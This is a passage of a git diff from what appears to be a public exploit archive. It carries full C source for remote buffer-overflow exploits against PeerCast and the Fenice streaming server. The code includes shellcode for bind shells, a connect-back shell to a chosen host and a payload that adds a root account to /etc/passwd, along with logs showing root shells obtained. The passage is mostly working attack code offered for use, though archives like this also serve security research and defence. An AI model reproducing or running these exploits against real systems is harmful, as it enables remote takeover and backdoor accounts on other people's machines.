"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xcd\x80"}, + {"Linux connect() shellcode (4444/tcp default)",32,26, + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" + "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x01\x02\x03\x04\x66\x68" + "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" + "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xb0\x0b\xcd\x80"}, + {"Linux add user 'syscfg' with {null} password and UID 0",-1,-1, + "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65" + "\x74\x63\x89\xE6\x31\xD2\x31\xC9\xB1\x01\x89\xF3\x31\xC0\xB0\x05" + "\xCD\x80\x50\x89\xE6\x31\xC0\xB0\x13\x8B\x1E\x31\xC9\x31\xD2\xB2" + "\x02\xCD\x80\x31\xC0\xB0\x04\x8B\x1E\x31\xC9\x51\x68\x61\x73\x68" + "\x0A\x68\x69\x6E\x2F\x62\x68\x74\x3A\x2F\x62\x68\x2F\x72\x6F\x6F" + "\x68\x63\x66\x67\x3A\x68\x66\x6F\x72\x20\x68\x73\x65\x72\x20\x68" + "\x65\x6D\x20\x75\x68\x73\x79\x73\x74\x68\x30\x3A\x30\x3A\x68\x66" + "\x67\x3A\x3A\x68\x73\x79\x73\x63\x89\xE1\x31\xD2\xB2\x30\xCD\x80" + "\x31\xC0\xB0\x06\x8B\x1E\xCD\x80"} +}; + +void dummyhandler(){ +} + +int main (int argc, char *argv[]) { + int sd, rc, i, c, ret, payg, paya, payb, eip, ishell = 0, port = 7144, ihost = 0, itarg = 0; + int count, offset, ioffset, index = 0; + short shellport; + char *host, *buffer, *buffer2, *payload; + struct sockaddr_in localAddr, servAddr; + struct hostent *h, *rv; + static struct option options[] = { + {"server", 1, 0, 's'}, + {"port", 1, 0, 'p'}, + {"target", 1, 0, 't'}, + {"shellcode", 1, 0, 'c'}, + {"shellport", 1, 0, 'x'}, + {"shellhost", 1, 0, 'i'}, + {"help", 0, 0,'h'} + }; + printf("[ GNU PeerCast <= v0.1216 remote exploit\n"); + while(c != -1) + { + c = getopt_long(argc,argv,"s:p:t:c:x:i:h",options,&index); + switch(c) { + case -1: + break; + case 's': + if(ihost==0){ + h = gethostbyname(optarg); + if(h==NULL){ + printf("[ Error unknown host '%s'\n",optarg); + exit(1); + } + host = malloc(strlen(optarg) + 1); + sprintf(host,"%s",optarg); + ihost = 1; + } + break; + case 'p': + port = atoi(optarg); + break; + case 'c': + if(ishell==0) + { + payg = atoi(optarg); + switch(payg){ + case 0: + printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + case 1: + printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + case 2: + printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + default: + printf("[ Invalid shellcode selection %d\n",payg); + exit(0); + break; + } + } + break; + case 'x': + if(ishell==1) + { + if(shellcodes[payg].port > -1) + { + paya = strlen(payload); + shellport = atoi(optarg); + shellport =(shellport&0xff)<<8 | shellport>>8; + memcpy(&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); + if(paya > strlen(payload)) + { + printf("[ Shellcode port introduces null bytes\n"); + exit(1); + } + } + else{ + printf("[ (%s) port selection is ignored for current shellcode\n",optarg); + } + } + else{ + printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg); + break; + } + break; + case 'i': + if(ishell==1) + { + if(shellcodes[payg].host > -1) + { + paya = strlen(payload); + rv = gethostbyname(optarg); + if(h==NULL){ + printf("[ Error unknown host '%s'\n",optarg); + exit(1); + } + memcpy(&payload[shellcodes[payg].host],rv->h_addr_list[0], rv->h_length); + if(paya > strlen(payload)) + { + printf("[ Shellhost introduces null bytes\n"); + exit(1); + } + } + else{ + printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg); + } + } + else{ + printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg); + } + break; + case 't': + if(itarg==0){ + ret = atoi(optarg); + switch(ret){ + case 0: + printf("[ Using target '%s'\n",targets[ret].name); + eip = targets[ret].retaddr; + break; + case 1: + printf("[ Using target '%s'\n",targets[ret].name); + eip = targets[ret].retaddr; + break; + default: + eip = strtoul(optarg,NULL,16); + printf("[ Using return address '0x%x'\n",eip); + break; + } + itarg = 1; + } + break; + case 'h': + printf("[ Usage instructions.\n[\n"); + printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); + printf("[ --port|-p (port)[default 7144]\n[ --shellcode|-c \n"); + printf("[ --shellport|-x (port)\n"); + printf("[ --shellhost|-i (ip/hostname)\n"); + printf("[ --target|-t \n[\n"); + printf("[ Target#'s\n"); + for(count = 0;count <= targetno - 1;count++){ + printf("[ %d %s 0x%x\n",count,targets[count],targets[count]); + } + printf("[\n[ Shellcode#'s\n"); + for(count = 0;count <= shellno - 1;count++){ + printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); + } + exit(0); + break; + default: + break; + } + } + if(itarg != 1 || ihost != 1 || ishell != 1){ + printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); + exit(1); + } + signal(SIGPIPE,dummyhandler); + servAddr.sin_family = h->h_addrtype; + memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + servAddr.sin_port = htons(port); + sd = socket(AF_INET, SOCK_STREAM, 0); + if(sd<0) { + printf("[ Cannot open socket\n"); + exit(1); + } + rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); + if(rc<0) { + printf("[ Cannot connect\n"); + exit(1); + } + printf("[ Connected to %s (%d/tcp)\n",host,port); + buffer = malloc(2048 + strlen(payload) + sizeof(eip)); + memset(buffer,0,2048 + strlen(payload) + sizeof(eip)); + strcpy(buffer,"GET /stream/?"); + for(count = 0;count <= 779;count++){ + strcat(buffer,"A"); + } + buffer2 = (char*)((int)buffer + (int)strlen(buffer)); + memcpy((void*)buffer2,(void*)&eip,sizeof(eip)); + buffer2 = (char*)((int)buffer2 + sizeof(eip)); + memcpy((void*)buffer2,(void*)payload,strlen(payload)); + strcat(buffer2,"\r\n"); + rc = send(sd,buffer,strlen(buffer),0); + printf("[ Sent %d bytes to target\n",rc); +} + +// milw0rm.com [2006-03-11] diff --git a/platforms/linux/remote/1578.c b/platforms/linux/remote/1578.c index a47321e48..4b8d7bbbc 100755 --- a/platforms/linux/remote/1578.c +++ b/platforms/linux/remote/1578.c @@ -1,134 +1,134 @@ -/* -\ PeerCast <=0.1216 remote exploit -/ by Darkeagle -\ -/ 09.03.06 -\ -/ -\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz. -/ -\ -/ http://unl0ck.net - -******************************************* -root@localhost darkeagle]# telnet localhost 36864 -Trying 127.0.0.1... -Connected to localhost (127.0.0.1). -Escape character is '^]'. -id; -uid=0(root) gid=0(root) groups=0(root) -: command not found -uname -a; -Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux -: command not found -******************************************* - -Special tnx goes to: Dr_UF0 for targets support :) - -\ -/ -\ -*/ - -#include -#include -#include -#include -#include -#include -#include - - -char scode[]= // binds 4444 port -"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" -"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" -"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" -"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" -"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" -"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" -"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; - -char linuxshellcode[]= // binds 36864 port - "\xeb\x6e\x5e\x29\xc0\x89\x46\x10" - "\x40\x89\xc3\x89\x46\x0c\x40\x89" - "\x46\x08\x8d\x4e\x08\xb0\x66\xcd" - "\x80\x43\xc6\x46\x10\x10\x88\x46" - "\x08\x31\xc0\x31\xd2\x89\x46\x18" - "\xb0\x90\x66\x89\x46\x16\x8d\x4e" - "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0" - "\x66\xcd\x80\x89\x5e\x0c\x43\x43" - "\xb0\x66\xcd\x80\x89\x56\x0c\x89" - "\x56\x10\xb0\x66\x43\xcd\x80\x86" - "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0" - "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd" - "\x80\x88\x56\x07\x89\x76\x0c\x87" - "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80" - "\xe8\x8d\xff\xff\xff\x2f\x62\x69" - "\x6e\x2f\x73\x68"; - - - -void usage(char *proga) -{ - printf("usage> %s \n", proga); -} - -int main( int argc, char *argv[] ) -{ -int sock; -struct sockaddr_in addr; -char evil[1024], get[1024]; - -long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz - - -system("clear"); -printf(".::: PeerCast <= 0.1215 remote exploit :::.\n"); -printf(" by Darkeagle \n\n"); -printf(" bug founder: Leon Juranic\n"); -printf("\n keep private!!!\n"); - -if ( argc < 3 ) -{ -usage(argv[0]); -exit(0); -} - -sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); - -addr.sin_family = AF_INET; -addr.sin_port = htons(atoi(argv[2])); -addr.sin_addr.s_addr = inet_addr(argv[1]); - -printf("\nexp> connecting...\n"); - -if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 ) -{ -printf("exp> connection failed\n"); -exit(0); -} - -printf("exp> connection enstabilished!\n"); - -memset(evil, 0x00, 1024); -memset(get, 0x00, 1024); -memset(evil, 0x55, 800); -//memcpy(evil+strlen(evil), &scode, sizeof(scode)); -memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode)); - -strcpy(get, "GET /stream/?"); - -*(long*)&evil[780] = retaddr; -strcat(evil, "\r\n\r\n"); -strcat(get, evil); - -sleep(1); -printf("exp> sending evil data\n"); -send(sock, get, strlen(get), 0); -printf("exp> done!\n"); -printf("exp> check shell\n"); -close(sock); -return 0; -} - -// milw0rm.com [2006-03-12] +/* +\ PeerCast <=0.1216 remote exploit +/ by Darkeagle +\ +/ 09.03.06 +\ +/ +\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz. +/ +\ +/ http://unl0ck.net + +******************************************* +root@localhost darkeagle]# telnet localhost 36864 +Trying 127.0.0.1... +Connected to localhost (127.0.0.1). +Escape character is '^]'. +id; +uid=0(root) gid=0(root) groups=0(root) +: command not found +uname -a; +Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux +: command not found +******************************************* + +Special tnx goes to: Dr_UF0 for targets support :) + +\ +/ +\ +*/ + +#include +#include +#include +#include +#include +#include +#include + + +char scode[]= // binds 4444 port +"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" +"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" +"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" +"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" +"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" +"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" +"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; + +char linuxshellcode[]= // binds 36864 port + "\xeb\x6e\x5e\x29\xc0\x89\x46\x10" + "\x40\x89\xc3\x89\x46\x0c\x40\x89" + "\x46\x08\x8d\x4e\x08\xb0\x66\xcd" + "\x80\x43\xc6\x46\x10\x10\x88\x46" + "\x08\x31\xc0\x31\xd2\x89\x46\x18" + "\xb0\x90\x66\x89\x46\x16\x8d\x4e" + "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0" + "\x66\xcd\x80\x89\x5e\x0c\x43\x43" + "\xb0\x66\xcd\x80\x89\x56\x0c\x89" + "\x56\x10\xb0\x66\x43\xcd\x80\x86" + "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0" + "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd" + "\x80\x88\x56\x07\x89\x76\x0c\x87" + "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80" + "\xe8\x8d\xff\xff\xff\x2f\x62\x69" + "\x6e\x2f\x73\x68"; + + + +void usage(char *proga) +{ + printf("usage> %s \n", proga); +} + +int main( int argc, char *argv[] ) +{ +int sock; +struct sockaddr_in addr; +char evil[1024], get[1024]; + +long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz + + +system("clear"); +printf(".::: PeerCast <= 0.1215 remote exploit :::.\n"); +printf(" by Darkeagle \n\n"); +printf(" bug founder: Leon Juranic\n"); +printf("\n keep private!!!\n"); + +if ( argc < 3 ) +{ +usage(argv[0]); +exit(0); +} + +sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); + +addr.sin_family = AF_INET; +addr.sin_port = htons(atoi(argv[2])); +addr.sin_addr.s_addr = inet_addr(argv[1]); + +printf("\nexp> connecting...\n"); + +if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 ) +{ +printf("exp> connection failed\n"); +exit(0); +} + +printf("exp> connection enstabilished!\n"); + +memset(evil, 0x00, 1024); +memset(get, 0x00, 1024); +memset(evil, 0x55, 800); +//memcpy(evil+strlen(evil), &scode, sizeof(scode)); +memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode)); + +strcpy(get, "GET /stream/?"); + +*(long*)&evil[780] = retaddr; +strcat(evil, "\r\n\r\n"); +strcat(get, evil); + +sleep(1); +printf("exp> sending evil data\n"); +send(sock, get, strlen(get), 0); +printf("exp> done!\n"); +printf("exp> check shell\n"); +close(sock); +return 0; +} + +// milw0rm.com [2006-03-12] diff --git a/platforms/linux/remote/167.c b/platforms/linux/remote/167.c index 709abdba3..fd8859690 100755 --- a/platforms/linux/remote/167.c +++ b/platforms/linux/remote/167.c @@ -303,6 +303,6 @@ int main(int argc,char *argv[]) { printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]); printf("- Read source to know what to do to check if the exploit worked\n"); return 0; -} - -// milw0rm.com [2004-03-28] +} + +// milw0rm.com [2004-03-28] diff --git a/platforms/linux/remote/1717.c b/platforms/linux/remote/1717.c index 9881ab02f..03e274615 100755 --- a/platforms/linux/remote/1717.c +++ b/platforms/linux/remote/1717.c @@ -1,275 +1,275 @@ -/* - IHS Iran Homeland Security public source code - Fenice - Open Media Streaming Server remote BOF exploit - author : c0d3r "kaveh razavi" c0d3r@ihsteam.com - package : fenice-1.10.tar.gz and prolly prior versions - workaround : update after patch release - advisory : http://www.securityfocus.com/bid/17678 - company address : http://streaming.polito.it/server - timeline : - 23 Apr 2006 : vulnerability reported by Luigi Auriemma - 25 Sep 2006 : IHS exploit released - exploit features : - 1) a global offset - 2) reliable metasploit shellcode - 3) autoconnect to shell - bad chars : 0x00 0x05 encoder : PexAlphaNum - compiled with gcc under Linux : gcc fenice.c -o fenice - - ************************************************************** - - Exploitation Method : linux-gate.so.1 - - the refrence written by izik could be downloaded from milw0rm. - after some research I realized that the offset is very stable - around 2.6 kernels compiled from source. the VA patch will - easily get bypassed. if you want to exploit 2.4 kernels - you can jump directly to the shellcode , there isn't any - stack randomization for sure in 2.4.* by default. - the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag - (slackware 10.2), also on 2.6.15.4 compiled with i386 flag - (Fedora core 2) was same. on default installation of fc3 the - linux-gate.so.1 has null at the first , so think of another - way to jump to the shellcode. - - ************************************************************** - - greeting to : - - www.ihsteam.com the team , LorD and NT - www.ihsteam.net english version , - www.c0d3r.org my home :) - www.underground.ir friends who are participating in the forums - www.exploitdev.com Jamie and Ben , those times are now legend - www.milw0rm.com str0ke , keep the good job going - -/* -/* - -[c0d3r]$ gcc fenice.c -o fenice -[c0d3r]$ ./fenice 127.0.0.1 554 0 - --------- fenice - Open Media Streaming Project remote BOF exploit --------- copyrighted by c0d3r of IHS 2006 - -[+] Targeting slackware 10.2 -[+] Shellcode size : 329 bytes -[+] Building overflow string -[+] attacking host 127.0.0.1 -[+] packet size = 750 byte -[+] connected -[+] sending the overflow string -[+] exploit sent successfully to 127.0.0.1 -[+] trying to get shell -[+] connecting to 127.0.0.1 on port 4444 -[+] target exploited successfully -[+] Dropping into shell - -uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) -Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux - - -*/ - - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#define inc 0x41 -#define size 750 - - -void gotshell(int new_sock); -void usage(); - -// metasploit.com shellcode - badchars = 0x00 0x05 -// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum -// I had a bit difficulty to execute my shellcode because some chars -// badly interpreted by fenice , anyway viva metasploit ! - -unsigned char shellcode[] = - -"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff" -"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56" -"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58" -"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44" -"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d" -"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36" -"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49" -"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35" -"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45" -"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e" -"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e" -"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55" -"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b" -"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56" -"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55" -"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a"; - -char slack [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 -char FC2_2_6_15[] = "\x77\xe7\xff\xff"; // Fedora core 2 , 2.6.15.4 -char debug [] = "\xdd\xdd\xdd\xdd"; // debugging purpose -char ret[4]; -char get [] = "\x47\x45\x54\x20\x2f"; -struct hostent *hp; -struct sockaddr_in con; -unsigned int rc,rc2,len=16,sock,sock2,os,addr,port; -char buffer[size]; - -// gotshell is from jamie (darkdud3) remote exploit sample -// with a bit change - -void gotshell(int sock){ - - fd_set fd_read; - char buff[1024]; - char cmd[100] = "id;uname -a\n"; - int n; - - FD_ZERO(&fd_read); - FD_SET(sock, &fd_read); - FD_SET(0, &fd_read); - send(sock, cmd, strlen(cmd), 0); - while(1) { - FD_SET(sock,&fd_read); - FD_SET(0,&fd_read); - if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; - if( FD_ISSET(sock, &fd_read) ) { - if((n=recv(sock,buff,sizeof(buff),0))<0){ - fprintf(stderr, "EOF\n"); - exit(2); - } - if(write(1,buff,n)<0)break; - } - if ( FD_ISSET(0, &fd_read) ) { - if((n=read(0,buff,sizeof(buff)))<0){ - fprintf(stderr,"EOF\n"); - exit(2); - } - if(send(sock,buff,n,0)<0) break; - } - usleep(10); - } - fprintf(stderr,"Connection aborted, select failed()\n"); - exit(0); -} - -void usage(char *arg){ - printf("-------- usage : %s host_or_ip port target\n",arg); - printf("-------- example : %s localhost 554 0\n",arg); - printf("-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\n"); - printf("-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\n"); - printf("-------- target 2 : debug : 2\n\n"); - exit(-1) ; -} - -int main(int argc,char **argv){ - - printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n"); - printf("-------- copyrighted by c0d3r of IHS 2006\n\n"); - if(argc != 4) - usage(argv[0]); - os = (unsigned short)atoi(argv[3]); - switch(os){ - case 0: - strcat(ret,slack); - printf("[+] Targeting slackware 10.2\n"); - break; - case 1: - strcat(ret,FC2_2_6_15); - printf("[+] Targeting fedora core 2 \n"); - break; - case 2: - strcat(ret,debug); - printf("[+] Debugging\n"); - break; - default: - printf("\n[-] This target doesnt exist in the list\n\n"); - - exit(-1); - } - printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1); - printf("[+] Building overflow string\n"); - - // heart of exploit - - memset(buffer,inc,size); - memcpy(buffer,get,5); - memcpy(buffer+5+361,ret,4); - memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1); - buffer[size] = 0; - - // EO heart of exploit - - hp = gethostbyname(argv[1]); - if (!hp) - addr = inet_addr(argv[1]); - if ((!hp) && (addr == INADDR_NONE) ){ - printf("[-] unable to resolve %s\n",argv[1]); - exit(-1); - } - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - if (hp != NULL) - memcpy(&(con.sin_addr),hp->h_addr,hp->h_length); - else - con.sin_addr.s_addr = addr; - if (hp) - con.sin_family = hp->h_addrtype; - else - con.sin_family = AF_INET; - port=atoi(argv[2]); - con.sin_port=htons(port); - printf("[+] attacking host %s\n" , argv[1]) ; - sleep(1); - printf("[+] packet size = %d byte\n" , sizeof(buffer)); - rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); - if(!rc){ - sleep(1) ; - printf("[+] connected\n") ; - printf("[+] sending the overflow string\n") ; - send(sock,buffer,strlen(buffer),0); - send(sock,"\n",1,0); - sleep(1) ; - send(sock,"\n",1,0); - sleep(1) ; - printf("[+] exploit sent successfully to %s \n" , argv[1]); - printf("[+] trying to get shell\n"); - printf("[+] connecting to %s on port 4444\n",argv[1]); - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - con.sin_family = AF_INET; - con.sin_port=htons(4444); - rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); - if(rc2 != 0) { - printf("[-] exploit probably failed\n"); - exit(-1); - } - if(!rc2){ - printf("[+] target exploited successfully\n"); - printf("[+] Dropping into shell\n\n"); - gotshell(sock); - } - } -} - -// milw0rm.com [2006-04-25] +/* + IHS Iran Homeland Security public source code + Fenice - Open Media Streaming Server remote BOF exploit + author : c0d3r "kaveh razavi" c0d3r@ihsteam.com + package : fenice-1.10.tar.gz and prolly prior versions + workaround : update after patch release + advisory : http://www.securityfocus.com/bid/17678 + company address : http://streaming.polito.it/server + timeline : + 23 Apr 2006 : vulnerability reported by Luigi Auriemma + 25 Sep 2006 : IHS exploit released + exploit features : + 1) a global offset + 2) reliable metasploit shellcode + 3) autoconnect to shell + bad chars : 0x00 0x05 encoder : PexAlphaNum + compiled with gcc under Linux : gcc fenice.c -o fenice + + ************************************************************** + + Exploitation Method : linux-gate.so.1 + + the refrence written by izik could be downloaded from milw0rm. + after some research I realized that the offset is very stable + around 2.6 kernels compiled from source. the VA patch will + easily get bypassed. if you want to exploit 2.4 kernels + you can jump directly to the shellcode , there isn't any + stack randomization for sure in 2.4.* by default. + the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag + (slackware 10.2), also on 2.6.15.4 compiled with i386 flag + (Fedora core 2) was same. on default installation of fc3 the + linux-gate.so.1 has null at the first , so think of another + way to jump to the shellcode. + + ************************************************************** + + greeting to : + + www.ihsteam.com the team , LorD and NT + www.ihsteam.net english version , + www.c0d3r.org my home :) + www.underground.ir friends who are participating in the forums + www.exploitdev.com Jamie and Ben , those times are now legend + www.milw0rm.com str0ke , keep the good job going + +/* +/* + +[c0d3r]$ gcc fenice.c -o fenice +[c0d3r]$ ./fenice 127.0.0.1 554 0 + +-------- fenice - Open Media Streaming Project remote BOF exploit +-------- copyrighted by c0d3r of IHS 2006 + +[+] Targeting slackware 10.2 +[+] Shellcode size : 329 bytes +[+] Building overflow string +[+] attacking host 127.0.0.1 +[+] packet size = 750 byte +[+] connected +[+] sending the overflow string +[+] exploit sent successfully to 127.0.0.1 +[+] trying to get shell +[+] connecting to 127.0.0.1 on port 4444 +[+] target exploited successfully +[+] Dropping into shell + +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) +Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux + + +*/ + + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define inc 0x41 +#define size 750 + + +void gotshell(int new_sock); +void usage(); + +// metasploit.com shellcode - badchars = 0x00 0x05 +// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum +// I had a bit difficulty to execute my shellcode because some chars +// badly interpreted by fenice , anyway viva metasploit ! + +unsigned char shellcode[] = + +"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff" +"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56" +"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58" +"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44" +"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d" +"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36" +"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49" +"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35" +"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45" +"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e" +"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e" +"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55" 